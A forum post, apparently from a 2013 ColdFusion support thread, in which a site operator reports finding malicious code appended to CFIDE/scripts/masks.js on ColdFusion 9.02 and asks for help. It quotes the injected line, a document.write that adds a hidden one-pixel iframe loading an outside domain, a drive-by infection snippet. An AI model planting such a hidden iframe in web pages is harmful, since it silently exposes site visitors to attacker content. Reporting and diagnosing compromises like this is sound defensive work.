8 Replies Latest reply on Sep 5, 2013 2:10 AM by tribule

    CFIDE/scripts/masks.js Compromised

    XeeMe2

      We just found an injection at the end of masks.js

       

      Here is the content that was added:

      "document.write("<iframe width='1' height='0' src='http://top12.oufm.info/'></iframe>");"

       

      Not sure what to make out of it. We have a very cryptic password known only to 2 people. Hacking the server would be pretty difficult so I assume somehow hacking into CFIDE was the issue. Anybody seen anything similar?

       

      It must have happened August 31, 2013

      We are using CF 9.02 with ....lib/updates/hf902-00003.jar

       

      Thanks for any feedback and advice how to prevent another one

       

      Rob